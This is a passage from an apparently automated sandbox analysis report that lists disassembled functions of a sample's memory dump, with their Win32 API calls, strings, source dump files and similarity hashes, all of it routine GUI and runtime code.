Instruction Fuzzy Hash: D851F371A0020AAFCF11DFA8D8889EEBBF9FF98710F20452AE515E7250D7359A45CF60

Function 0053135D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00531367
GetWindowLongW.USER32(?,000000F0), ref: 005313CA
_memset.LIBCMT ref: 0053148B
GetMenuItemInfoW.USER32 ref: 005314B6
InvalidateRect.USER32(?,00000000,00000001), ref: 00531531
UpdateWindow.USER32(?), ref: 0053153A

Part of subcall function 0051B0E6: SendMessageW.USER32(?,00000229,00000000,?), ref: 0051B111

Strings

0, xrefs: 005314A2

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$H_prolog3_InfoInvalidateItemLongMenuMessageRectSendUpdate_memset
String ID: 0
API String ID: 3082450406-4108050209
Opcode ID: 27435166f3ba2d9d54ce9b399b3c4001effcf6c9185133a6bd24637aa54c9c58
Instruction ID: 5b34489399053c8b561210c193e95b98efaf6c5a94cc3b85c217e5ab35af9b19
Opcode Fuzzy Hash: 27435166f3ba2d9d54ce9b399b3c4001effcf6c9185133a6bd24637aa54c9c58
Instruction Fuzzy Hash: F751A031500256DFDF24EBB4CC98BEDBFB9BF58340F2042AEA45A97191DE305A84CB50

Function 0050851D Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00508527
CloseHandle.KERNEL32(kQZ,00000080,005A516B,?,00000000,?,00000000), ref: 00508560
GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,00000080,005A516B,?,00000000,?,00000000), ref: 00508587
GetTempFileNameW.KERNEL32(000000FF,AFX,00000000,00000000,00000104,00000000,000000FF,?,00000000), ref: 005085BE
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000000), ref: 005085E0

Strings

kQZ, xrefs: 00508541, 0050855D, 00508544
AFX, xrefs: 005085B6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FileTemp$CloseCreateH_prolog3_catchHandleNamePath
String ID: AFX$kQZ
API String ID: 1737446630-3988653215
Opcode ID: 4c66b7ae4beba6d683185f5163a494182adf86414664d82a0a6495c8ebb1bbf4
Instruction ID: 355ef2e2c6ca22c7b1eebcf118faa8d361a18451ea0509d1a9e1e009bd2fe4c3
Opcode Fuzzy Hash: 4c66b7ae4beba6d683185f5163a494182adf86414664d82a0a6495c8ebb1bbf4
Instruction Fuzzy Hash: 7241AD70800159AFCB00EBA5CD56EFEBBB8AF54318F10425EB552A72E1DF386A05CB65

Function 004E4D60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E4CAE: GetParent.USER32(?), ref: 004E4D02
Part of subcall function 004E4CAE: GetLastActivePopup.USER32(?), ref: 004E4D13
Part of subcall function 004E4CAE: IsWindowEnabled.USER32(?), ref: 004E4D27
Part of subcall function 004E4CAE: EnableWindow.USER32(?,00000000), ref: 004E4D3A

EnableWindow.USER32(?,00000001), ref: 004E4DAD
GetWindowThreadProcessId.USER32(?,?), ref: 004E4DC1
GetCurrentProcessId.KERNEL32(?,?), ref: 004E4DCB
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004E4DE3
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 004E4E5F
EnableWindow.USER32(00000000,00000001), ref: 004E4EA6

Strings

0, xrefs: 004E4E38

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 6631e69f15a2913362f16226786d909313ac05131970e01b3f78291e6b843c3f
Instruction ID: c246ba07a7f0f036a696e22cdc18a083cd41b74647420cac4000ecb048a6819a
Opcode Fuzzy Hash: 6631e69f15a2913362f16226786d909313ac05131970e01b3f78291e6b843c3f
Instruction Fuzzy Hash: 2E41C372A002589BCB219F6ACC89BAA77B5FF94701F10059AF519D7290D774DE80CB98

Function 0055EBDB Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0055EBE2

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

_wcslen.LIBCMT ref: 0055EC5E
_wcslen.LIBCMT ref: 0055EC97
_wcslen.LIBCMT ref: 0055ECB3
_wcslen.LIBCMT ref: 0055ECCF

Strings

4)b, xrefs: 0055EC83
SOFTWARE\, xrefs: 0055EC58, 0055EC5D, 0055EC65

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen$H_prolog3$Exception@8Throw
String ID: 4)b$SOFTWARE\
API String ID: 1893837447-569670547
Opcode ID: 75a24cd5d015db167e400fbcabd6be45ec134c5d3faa39e1637de6d007ac7a5b
Instruction ID: 9ccc48dd914ba606e1b49abae15a53c9e2e90c33105993cf175739f4037565e4
Opcode Fuzzy Hash: 75a24cd5d015db167e400fbcabd6be45ec134c5d3faa39e1637de6d007ac7a5b
Instruction Fuzzy Hash: 43316E719110669FCB08BFA1CCA2ABE7769FF10319714446FB416672A2CE38AE44CB55

Function 004D67F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004D681D
std::_Lockit::_Lockit.LIBCPMT ref: 004D6840
std::bad_exception::bad_exception.LIBCMT ref: 004D68C4
__CxxThrowException@8.LIBCMT ref: 004D68D2
std::_Lockit::_Lockit.LIBCPMT ref: 004D68E5

Strings

t!b, xrefs: 004D6804
bad cast, xrefs: 004D68BC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Throwstd::bad_exception::bad_exception
String ID: bad cast$t!b
API String ID: 2513498551-3587272626
Opcode ID: f3b736e1130c2e4b8abb255fd1b382893b1c1dc76d8cee7ed756740516908358
Instruction ID: 23ff7f64cc5b014317db250d6fbcecd24532471189feb2112079a90d81c8428d
Opcode Fuzzy Hash: f3b736e1130c2e4b8abb255fd1b382893b1c1dc76d8cee7ed756740516908358
Instruction Fuzzy Hash: CC31E2759412059FCB24EF54C865BAEBBB0FB02320F11012FF866A7390DB34AD40CB91

Function 00555647 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00555690
GetSystemMenu.USER32(?,00000000,00000000), ref: 005556BE
_memset.LIBCMT ref: 005556DD
GetMenuItemInfoW.USER32(?,0000F060,00000000,?), ref: 005556FD
SendMessageW.USER32(?,00000112,0000F060,00000000), ref: 00555716

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Strings

`-a, xrefs: 0055567D
0, xrefs: 005556EF

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Exception@8H_prolog3InfoItemMessageParentSendSystemThrow_memset
String ID: 0$`-a
API String ID: 177973330-438024179
Opcode ID: d9dd5ee295e815c68e26a3dce18bc427017af24e4fca45aad72be9d549f5ac45
Instruction ID: 2b6faeed0d5e933367610ac5c4674b309f69ae6aaceea225bfb96a561cdfa022
Opcode Fuzzy Hash: d9dd5ee295e815c68e26a3dce18bc427017af24e4fca45aad72be9d549f5ac45
Instruction Fuzzy Hash: B221C532A10614BBDB106BA1DCA9F6E7FA9FB14745F04002BFA05D6192EB759C14CBA4

Function 0053AE15 Relevance: 12.3, APIs: 8, Instructions: 313windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0053AE58

Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139

SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 0053AE83
OffsetRect.USER32(?,?,?), ref: 0053AEB5

Part of subcall function 0055C6F6: _memcpy_s.LIBCMT ref: 0055C728
Part of subcall function 0055C6F6: SendMessageW.USER32(?,00000434,00000000,?), ref: 0055C744

CopyRect.USER32(?,?), ref: 0053AF6B
GetWindowRect.USER32(?,?), ref: 0053AFC1
CopyRect.USER32(?,?), ref: 0053B08E
CopyRect.USER32(?,?), ref: 0053B0C1
CopyRect.USER32(?,?), ref: 0053B13B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Copy$ClientMessageScreenSendWindow$Offset_memcpy_s
String ID:
API String ID: 477270663-0
Opcode ID: 472a7ec1fd025650dcfd4e0256409b8fecc564e3b488e5866292959ff75815a2
Instruction ID: 14fb41380d852303dca18af0886c1cbbe96b50a5386bf24167aa9798e820bc5a
Opcode Fuzzy Hash: 472a7ec1fd025650dcfd4e0256409b8fecc564e3b488e5866292959ff75815a2
Instruction Fuzzy Hash: ACD14B71A0020ACFDF14DFA8C8889AEBBF9FF48310F14456AE916EB245DB34A945CF11

Function 005236C8 Relevance: 12.2, APIs: 8, Instructions: 239windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 005236F7
IsWindowVisible.USER32(?), ref: 00523706
GetWindowRect.USER32(?,?), ref: 00523758
IsZoomed.USER32(?), ref: 00523767
SetWindowRgn.USER32(?,00000000,00000001), ref: 005237D4
_memset.LIBCMT ref: 005237F4
GetSystemMetrics.USER32(00000004), ref: 0052383E
_memset.LIBCMT ref: 0052390F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Visible_memset$MetricsRectSystemZoomed
String ID:
API String ID: 3274878110-0
Opcode ID: 93ba4191833a628d2fe620c2bc6b6399918a54dda09f829c7747c3d6172c4a7c
Instruction ID: 0003fe567a16db221fea61c6b12452b171e795fed506f63bcb64a607a26890cf
Opcode Fuzzy Hash: 93ba4191833a628d2fe620c2bc6b6399918a54dda09f829c7747c3d6172c4a7c
Instruction Fuzzy Hash: A1915BB1E012689FCF14DFA9D884AAEBBB5FF89700F14016AF805AB295D7349A41CF51

Function 00544BEB Relevance: 12.2, APIs: 8, Instructions: 204windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00544BF2
EnterCriticalSection.KERNEL32(00646BF4,00000014,0050809A,?,?,00000000,00000000,00000000,00000000), ref: 00544C17
SelectObject.GDI32(?,00000014), ref: 00544D06
LeaveCriticalSection.KERNEL32(00646BF4,?,00000014,0050809A,?,?,00000000,00000000,00000000,00000000), ref: 00544D25
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00544D48
SelectObject.GDI32(00000000), ref: 00544D57
CreateCompatibleDC.GDI32(00000000), ref: 00544DE1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00544E01

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
String ID:
API String ID: 4255533662-0
Opcode ID: 534f73a3b2758978a375b947764754979b4bb5b90f9f0af0c738de7a191ba462
Instruction ID: b0db649f774e4538377ff4b244c8ae7e2f27c71b9a0ddaf73ce9ee4ab50cdf48
Opcode Fuzzy Hash: 534f73a3b2758978a375b947764754979b4bb5b90f9f0af0c738de7a191ba462
Instruction Fuzzy Hash: 75717E30681B01CFCB21DF65C8C5BAABBE5FB94309B18892EE096C7650DB75AC94DF11

Function 005B03A0 Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005B03A7
EqualRect.USER32(?,?), ref: 005B03C6
EqualRect.USER32(?,?), ref: 005B03D7
CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 005B0427
CreateRectRgn.GDI32(?,00000000,?,?), ref: 005B045A
CreateRectRgnIndirect.GDI32(?), ref: 005B0466
SetWindowRgn.USER32(?,?,00000000), ref: 005B048D
RedrawWindow.USER32(?,00000000,00000000,00000105,00644F98,?,?,?,00000001,00000058), ref: 005B0505

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Create$EqualWindow$H_prolog3IndirectRedraw
String ID:
API String ID: 1234839666-0
Opcode ID: 967addd9ed8cca6719a3033dc40e587d72941fd3bb26b8b5337ade3b88724e34
Instruction ID: 350fe6d0446949b7b9567238fa6a3b4e98fb6b70e2ccec8dd221e2efa6cdb300
Opcode Fuzzy Hash: 967addd9ed8cca6719a3033dc40e587d72941fd3bb26b8b5337ade3b88724e34
Instruction Fuzzy Hash: 4B51057190011AAFCF05DFA4C989EEF7BB9FF44304F018129B915AB295DB74AA45CBA0

Function 004E96D3 Relevance: 12.1, APIs: 8, Instructions: 134windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004E9716
BeginDeferWindowPos.USER32(00000008), ref: 004E972E
GetTopWindow.USER32(?), ref: 004E9743
GetDlgCtrlID.USER32(00000000), ref: 004E9752
SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 004E9784
GetWindow.USER32(00000000,00000002), ref: 004E978D
CopyRect.USER32(?,?), ref: 004E97AB
EndDeferWindowPos.USER32(00000000), ref: 004E9822

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: 695d2aa19b6ffdba37820ea04dba401e91bf1038b54873b75af8d34ef5d99023
Instruction ID: 1b5398e3f5a50dc0e7f423605700cd5f2926b987538f7fb16842ed523893d5fe
Opcode Fuzzy Hash: 695d2aa19b6ffdba37820ea04dba401e91bf1038b54873b75af8d34ef5d99023
Instruction Fuzzy Hash: 2D516A31910258EFCF10DFAAC8849EEB7B5FF59302F14856AE805A7250DB389D45CFA8

Function 004F8497 Relevance: 12.1, APIs: 8, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 0054CB2E: ReleaseCapture.USER32 ref: 0054CB5C
Part of subcall function 0054CB2E: IsWindow.USER32(?), ref: 0054CB80
Part of subcall function 0054CB2E: DestroyWindow.USER32(?,?,004FC05C,?,?,?,?,?,004F21AF,00000000,?,004F1D2F), ref: 0054CB90

SetRectEmpty.USER32(?), ref: 004F84CA
ReleaseCapture.USER32 ref: 004F84D0
SetCapture.USER32(?,?,004FC05C,?,?,?,?,?,004F21AF,00000000,?,004F1D2F), ref: 004F84DF
GetCapture.USER32 ref: 004F8521
ReleaseCapture.USER32 ref: 004F8531
SetCapture.USER32(?,?,004FC05C,?,?,?,?,?,004F21AF,00000000,?,004F1D2F), ref: 004F8540
RedrawWindow.USER32(?,?,?,00000505), ref: 004F85AB
RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 004F85EA

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Capture$Window$Release$Redraw$DestroyEmptyRect
String ID:
API String ID: 2209428161-0
Opcode ID: 473b35e216affb7e5359716063e01b65812a5edc57426bbc3e4d949a5d1d9013
Instruction ID: d805d7ebdec1d58f20267765515201ff81670f0f609e4497afba7139354a3711
Opcode Fuzzy Hash: 473b35e216affb7e5359716063e01b65812a5edc57426bbc3e4d949a5d1d9013
Instruction Fuzzy Hash: 20416271200600AFDB24AB35C859E7B7BA5BF84719F150A1EF55ACB3A1DF38E800CB54

Function 005571F5 Relevance: 12.1, APIs: 8, Instructions: 107windowCOMMON

Download Yara Rule

APIs

MessageBeep.USER32(000000FF), ref: 00557256
ReleaseCapture.USER32 ref: 0055728D
GetClientRect.USER32(?,?), ref: 005572B8
MapWindowPoints.USER32(?,?,?,00000002), ref: 005572D1
GetCursorPos.USER32(?), ref: 005572E1
ScreenToClient.USER32(?,?), ref: 005572EE
PtInRect.USER32(?,?,?), ref: 005572FE
SendMessageW.USER32(?,00000203,?,?), ref: 0055731A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientMessageRect$BeepCaptureCursorPointsReleaseScreenSendWindow
String ID:
API String ID: 1719883865-0
Opcode ID: dda98a64803912ae9200034eff5fa37c26f1a4d96b14385b25c219a9fc93f1a1
Instruction ID: f8b3c33524309b42536f14a7767b6a6f247ea21aaaca85d1972684dc66702bcd
Opcode Fuzzy Hash: dda98a64803912ae9200034eff5fa37c26f1a4d96b14385b25c219a9fc93f1a1
Instruction Fuzzy Hash: 4C419D75604209AFCB149FA5D8989BEBBB6FF0C301F50492EF96AD7160CB34A948DF40

Function 00507688 Relevance: 12.1, APIs: 8, Instructions: 75keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(00000012), ref: 005076B8
GetAsyncKeyState.USER32(00000012), ref: 005076D2
_memset.LIBCMT ref: 005076F1
GetKeyboardState.USER32(?), ref: 00507700
GetKeyboardLayout.USER32(?), ref: 00507717
MapVirtualKeyW.USER32(?,00000000), ref: 00507733
ToUnicodeEx.USER32(?,00000000), ref: 0050773B
CharUpperW.USER32(?), ref: 00507748

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

